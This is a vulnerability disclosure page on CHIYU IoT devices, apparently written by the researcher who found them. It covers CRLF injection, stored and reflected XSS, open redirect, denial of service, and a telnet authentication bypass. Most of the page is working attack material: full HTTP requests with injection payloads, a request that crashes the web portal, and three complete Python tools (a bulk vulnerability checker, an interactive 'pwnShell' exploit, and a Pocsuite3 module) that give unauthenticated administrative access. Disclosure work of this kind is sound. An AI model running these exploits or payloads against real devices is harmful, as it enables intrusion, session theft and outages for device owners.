Red Teaming
Malware Analysis
IoT / Reverse / Firmware
CHIYU IoT devices
Vulnerabilities found on IoT devices from CHIYU.
CVE-2021-31249
Title: CRLF injection in CHIYU BF-430, BF-431, and BF-450M TCP/IP Converter devices
Vulnerability: CRLF injection
CVE ID: CVE-2021-31249
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
Affected parameter: redirect=
Component: all the CGI components
Payload:
%0d%0a%0d%0a<script>alert(document.domain)</script>Payload
1
setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>
Copied!
HTTP request
1
GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
2
Host: 192.168.187.12
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.12/manage.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
HTTP response
1
HTTP/1.1 302 Found
2
Location: setting.htm
3
<script>alert(document.domain)</script>
4
Content-Length: 0
5
Content-Type: text/html
Copied!
CHIYU TCP/IP Converter devices - CRLF injection
Exploit Database
nuclei-templates/CVE-2021-31249.yaml at master · projectdiscovery/nuclei-templates
GitHub
Impact: The impact of CRLF injections vary and also includes all the impacts of Cross-site Scripting to information disclosure.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
CVE-2021-31250
Title: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
Vulnerability: Stored XSS
CVE ID: CVE-2021-31250
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Multiple storage XSS vulnerabilities were discovered on BF-430, BF-431 and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, ppp.cgi.
To exploit this vulnerability, an attacker can inject a specially crafted XSS payload on several CGI components to obtain sensitive information from the end-user such as session cookies, or redirect it to a malicious web page.
Proof-of-Concept: 01
Affected parameter: TF_submask
Component: if.cgi
Payload:
"><script>alert(123)</script>HTTP request:
1
GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
2
Host: 192.168.187.12
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.12/ap_tcps.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
HTTP response:
Proof-of-Concept: 02
Affected parameter: TF_hostname=
Component: dhcpc.cgi
Payload:
/"><img src="#">HTTP request and response:
1
GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
2
Host: 192.168.187.12
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.12/wan_dc.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
Proof-of-Concept: 03
Affected parameter: TF_servicename=
Component: ppp.cgi
Payload:
"><script>alert(123)</script>HTTP request:
1
GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
2
Host: 192.168.187.143
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.143/wan_pe.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
HTTP response
Proof-of-Concept: 04
Affected parameter: TF_port=
Component: man.cgi
Payload:
/"><img src="#">HTTP request:
1
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
2
Host: 192.168.187.12
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.12/manage.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
HTTP response:
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Exploit Database
nuclei-templates/CVE-2021-31250.yaml at master · projectdiscovery/nuclei-templates
GitHub
Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
CVE-2021-31251
Title: Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
Vulnerability: Authentication bypass
CVE ID: CVE-2021-31251
SSV-ID: SSV-99267
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
We can see in the next image the normal workflow with the authentication banner (left-side), and the exploited scenario with the configuration menu (right-side). In detail, when the telnet tries to negotiate the telnet states with the client-side, it fails - at the 4 TCP request - and the IoT device jumps to the next state and believes that the user has already authenticated.
In order to verify if this condition is also present on other devices, a PoC was created and the results can be observed below. On the left side, we can see a lot of devices vulnerable obtained by using the checker, and on the right-side the vulnerability confirmation using the exploit.
Checker in action with multi-thread and CIDR - Pocsuite3:
Exploit in action - Pocsuite3:
Seebug: https://www.seebug.org/vuldb/ssvid-99267
ExploitDB: https://www.exploit-db.com/exploits/49936
CHIYU IoT services Authentication bypass in telnet server(CVE-2021-31251) - Knownsec Seebug Vulnerability Platform
CHIYU IoT Devices - 'Telnet' Authentication Bypass
Exploit Database
Impact: Accessing remotely any device bypassing telnet authentication protocol.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability. In this new version, the telnet service was disabled in order to solve this issue.
From vendor website:
Regarding CVE-2021-31251, it explains about the CHIYU serial converts & SEMAC door control panel has a security issue.
Because the telnet is able to connect with the device.
For this reason, CHIYU would like to include below the measures to fix the problem.
From now, all of the shipment has the latest firmware.
The firmware will close telnet.
if you want to upgrade your converter's firmware, please contact CHIYU for upgrading.
Checker and Exploit
Checker
Exploit
PoCsuite
1
# Exploit Title: (Checker) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
2
# Date: June 01 2021
3
# Exploit Author: sirpedrotavares
4
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
5
# Software Link: https://www.chiyu-tech.com/category-hardware.html
6
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
7
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
8
#CVE: CVE-2021-31251
9
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
10
11
"""
12
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
13
CVE ID: CVE-2021-31251
14
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
16
"""
17
18
#!/usr/bin/env python3
19
20
#usage : python3 checker.py -t IP
21
#usage1: python3 checker.py -f target.txt
22
23
24
import socket
25
import time
26
import sys
27
28
def checker(HOST, PORT):
29
socket.setdefaulttimeout(10)
30
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31
try:
32
connect = s.connect_ex((HOST, PORT))
33
try:
34
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
35
s.recv(1024).strip()
36
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
37
s.recv(1024).strip()
38
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
39
result = s.recv(1024).strip()
40
if result != b'\xff\xfe\x01':
41
s.send(b"\x09")
42
result = s.recv(1024).strip()
43
s.close()
44
45
if connect == 0 and "sername" not in str(result):
46
if b"\xff\xfe\x01" == result:
47
print("[+] " + HOST + " is vulnerable to CVE-2021-31251!")
48
49
except KeyboardInterrupt:
50
s.close()
51
52
except EOFError:
53
s.close()
54
55
except socket.error:
56
print("[-] " + host + " NOT vulnerable!")
57
return 0
58
59
60
opt = sys.argv[1]
61
62
if opt == "-t":
63
HOST = sys.argv[2]
64
PORT = 23
65
elif opt == "-f":
66
PORT = 23
67
with open(sys.argv[2]) as f:
68
targets = [line.rstrip() for line in f]
69
else:
70
print("Check the parameters before execution the checker.")
71
exit(1)
72
73
if opt == "-t":
74
checker(HOST, PORT)
75
else:
76
for host in targets:
77
if host:
78
checker(host, PORT)
79
80
Copied!
1
# Exploit Title: (Exploit) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
2
# Date: June 01 2021
3
# Exploit Author: sirpedrotavares
4
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
5
# Software Link: https://www.chiyu-tech.com/category-hardware.html
6
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
7
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
8
#CVE: CVE-2021-31251
9
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
10
11
"""
12
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
13
CVE ID: CVE-2021-31251
14
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
16
"""
17
18
#!/usr/bin/env python3
19
20
# usage: python3 exploit.py IP
21
22
import socket
23
import time
24
import sys
25
26
HOST = sys.argv[1]
27
PORT = 23
28
29
socket.setdefaulttimeout(10)
30
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31
32
try:
33
connect = s.connect_ex((HOST, PORT))
34
try:
35
print("[+] Try to connect...\n")
36
time.sleep(1)
37
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
38
s.recv(1024).strip()
39
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
40
s.recv(1024).strip()
41
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
42
result = s.recv(1024).strip()
43
if result != b'\xff\xfe\x01':
44
s.send(b"\x09")
45
result = s.recv(1024).strip()
46
47
if connect == 0 and "sername" not in str(result):
48
if b"\xff\xfe\x01" == result:
49
print("Connected! ;)\ntype: \"help\"\n\n")
50
while 1:
51
cmd = input("(CHIYU pwnShell:) $ ")
52
body = cmd+"\n"
53
s.send(body.encode('utf-8', 'ignore'))
54
result = s.recv(1024).decode('utf8', 'ignore')
55
56
if not len(result):
57
print("[+] CHIYU device not available, try again ... (terminating)")
58
s.close()
59
break
60
print(result.strip('CMD>'))
61
b = "\n"
62
s.send(b.encode('utf-8', 'ignore'))
63
result = s.recv(1024).decode()
64
print(result.strip('CMD>'))
65
except KeyboardInterrupt:
66
print("\n[+] ^C Received, closing connection")
67
s.close()
68
except EOFError:
69
print("\n[+] ^D Received, closing connection")
70
s.close()
71
72
except socket.error:
73
print("[+] Unable to connect to CHIYU device.")
74
Copied!
1
import re
2
from collections import OrderedDict
3
import socket
4
from pocsuite3.api \
5
import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
6
from pocsuite3.lib.core.interpreter_option \
7
import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
8
from pocsuite3.modules.listener import REVERSE_PAYLOAD
9
10
11
class DemoPOC(POCBase):
12
vulID = 'CVE-2021-31251'
13
version = '1'
14
author = 'sirpedrotavares'
15
vulDate = '2021-04-15'
16
createDate = '2021-04-15'
17
updateDate = '2021-04-15'
18
references = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
19
name = 'pwnCHIYU'
20
appPowerLink = 'https://www.chiyu-tech.com'
21
appName = 'CHIYU telnet'
22
appVersion = 'Telnet service (all versions)'
23
vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
24
category = POC_CATEGORY.TOOLS.CRACK
25
protocol = POC_CATEGORY.PROTOCOL.TELENT
26
samples = []
27
install_requires = []
28
desc = '''
29
An authentication bypass in telnet server from CHIYU Technology Inc devices allows obtaining a privileged
30
connection with the target device by supplying a specially malformed request.
31
'''
32
pocDesc = '''
33
Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
34
telnet authentication process due to an overflow during the negotiation of the telnet protocol.
35
Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may
36
force the remote telnet server to believe that the user has already authenticated. Several models
37
are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
38
'''
39
40
def _verify(self):
41
output = Output(self)
42
result = {}
43
host = self.getg_option("rhost")
44
port = self.getg_option("rport") or 23
45
46
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
47
socket.setdefaulttimeout(10)
48
49
try:
50
connect = s.connect_ex((host, int(port)))
51
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
52
s.recv(1024).strip()
53
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
54
s.recv(1024).strip()
55
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
56
aux = s.recv(1024).strip()
57
if aux != b'\xff\xfe\x01':
58
s.send(b"\x09")
59
aux = s.recv(1024).strip()
60
61
s.close()
62
63
if connect == 0 and "sername" not in str(aux):
64
if b"\xff\xfe\x01" == aux:
65
result['VerifyInfo'] = {}
66
result['VerifyInfo']['rhost'] = self.url
67
return self.parse_attack(result)
68
else:
69
result['VerifyInfo'] = {}
70
return self.parse_attack(None)
71
else:
72
return self.parse_attack(None)
73
except socket.error:
74
return self.parse_attack(None)
75
76
def _attack(self):
77
output = Output(self)
78
result = {}
79
host = self.getg_option("rhost")
80
port = self.getg_option("rport") or 23
81
82
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
83
socket.setdefaulttimeout(10)
84
85
try:
86
connect = s.connect_ex((host, int(port)))
87
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
88
s.recv(1024).strip()
89
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
90
s.recv(1024).strip()
91
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
92
aux = s.recv(1024).strip()
93
if aux != b'\xff\xfe\x01':
94
s.send(b"\x09")
95
aux = s.recv(1024).strip()
96
97
if connect == 0 and "sername" not in str(aux):
98
if b"\xff\xfe\x01" == aux:
99
print("Connected! ;)\ntype: \"help\"\n\n")
100
while 1:
101
cmd = input("(CHIYU pwnShell:) $ ")
102
body = cmd + "\n"
103
s.send(body.encode('utf-8', 'ignore'))
104
result = s.recv(1024).decode('utf8', 'ignore')
105
106
if not len(result):
107
print("[+] CHIYU device not available, try again ... (terminating)")
108
s.close()
109
break
110
print(result.strip('CMD>'))
111
b = "\n"
112
s.send(b.encode('utf-8', 'ignore'))
113
result = s.recv(1024).decode()
114
print(result.strip('CMD>'))
115
116
except Exception as e:
117
output.fail('target is not vulnerable:' + str(e))
118
except KeyboardInterrupt:
119
output.success({})
120
except EOFError:
121
output.success({})
122
else:
123
output.success({})
124
125
return output
126
127
def parse_attack(self, result):
128
output = Output(self)
129
if result:
130
output.success(result)
131
else:
132
output.fail('target is not vulnerable')
133
134
return output
135
136
137
register_poc(DemoPOC)
Copied!
CVE-2021-31252
Title: Open redirect vulnerability in CHIYU IoT devices
Vulnerability: Open Redirect
CVE ID: CVE-2021-31252
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
An open redirect vulnerability exists in BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, and SEMAC devices from CHIYU Technology that can be exploited by sending a link that has a specially crafted URL to convince the user to click on it.
To exploit this vulnerability, an attacker can inject an arbitrary URL and convince the end-user to click on the link redirecting it to a page with malicious content. All the CGI components are affected by this flaw.
Affected parameter: redirect=
Component: all the CGI components (if.cgi, man.cgi, etc)
Payload:
redirect=http://127.0.0.1/exploit.htmHTTP request
1
GET /if.cgi?redirect=http://192.168.187.201/exploit.htm&failure=fail.htm&type=serial_apply&S_type=2&S_baud=3&S_userdefine=0&S_data=3&S_parity=0&S_stop=0&S_flowcontrol=0&S_timeout=0&S_length=0&S_delimiter1=00&S_deli_en1=0&S_delimiter2=00&S_deli_en2=0&B_apply=APPLY HTTP/1.1
2
Host: 192.168.187.12
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://192.168.187.12/serial.htm
8
Authorization: Basic OmFkbWlu
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
HTTP response
Impact: Open Redirect is due to the improper sanitization of input that can be used to redirect users to external websites.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
CVE-2021-31641
Title: Unauthenticated XSS in several CHIYU IoT devices
Vulnerability: Reflected XSS
CVE ID: CVE-2021-31641
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC. The vulnerability was observed also on more recent firmware versions.
Component: any argument passed via URL that results in an HTTP-404
Payload:
http://ip/<script>alert(123)</script>HTTP request
HTTP response
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Exploit Database
Impact: This vulnerability is due to the improper sanitization of input when the HTTP-404 page is presented and that can be abused to redirect users to external websites.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
CVE-2021-31642
Title: Denial of Service in several CHIYU IoT devices affecting the web-portal
Vulnerability: Integer overflow
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
Affected parameter: page=
Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000HTTP request
1
GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
2
Host: 127.0.0.1
3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
6
Accept-Encoding: gzip, deflate
7
Authorization: Basic YWRtaW46YWRtaW4=
8
Connection: close
9
Referer: http://127.0.0.1/AccLog.htm
10
Cookie: fresh=
11
Upgrade-Insecure-Requests: 1
Copied!
HTTP response
After the request, the web portal will be unavailable until a device reboot.
CHIYU IoT Devices - Denial of Service (DoS)
Exploit Database
Impact: Device crash and web portal unavailable.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
CVE-2021-31643
Title: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
Vulnerability: Stored XSS
CVE ID: CVE-2021-31643
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
A storage XSS flaw was discovered on SEMAC, Biosense, BF-630, BF-631, and Webpass IoT devices from CHIYU Technology Inc due to a lack of sanitization of the input on the component if.cgi - username parameter.
To exploit this vulnerability, an attacker can inject a specially crafted XSS payload on the if.cgi component to obtain sensitive information from the end-user such as session cookies, or redirect it to a malicious web page.
Affected parameter: username=
Component: if.cgi
Payload:
"><script>alert(1)</script>HTTP request
HTTP response - SEMAC Web Ver7.2
1
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
2
Host: 127.0.0.1
3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
6
Accept-Encoding: gzip, deflate
7
Authorization: Basic YWRtaW46YWRtaW4=
8
Connection: close
9
Referer: http://127.0.0.1/EmpRcd.htm
10
Cookie: fresh=; remote=00000000
11
Upgrade-Insecure-Requests: 1
Copied!
HTTP response - BIOSENSE-III-COMBO(M1)(20000)
1
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
2
Host: 127.0.0.1
3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
6
Accept-Encoding: gzip, deflate
7
Authorization: Basic YWRtaW46YWRtaW4=
8
Connection: close
9
Referer: http://127.0.0.1/EmpRcd.htm
10
Cookie: fresh=
11
Upgrade-Insecure-Requests: 1
Copied!
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Exploit Database
Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.
Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
References
Solve CVE-2021-31251 for BF-430/ BF-431/ BF-450M/ SEMAC
Dancing in the IoT: CHIYU devices vulnerable to remote attacks
Segurança Informática
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Exploit Database
CHIYU TCP/IP Converter devices - CRLF injection
Exploit Database
CHIYU IoT Devices - 'Telnet' Authentication Bypass
Exploit Database
CHIYU IoT Devices - Denial of Service (DoS)
Exploit Database
Last modified 5mo ago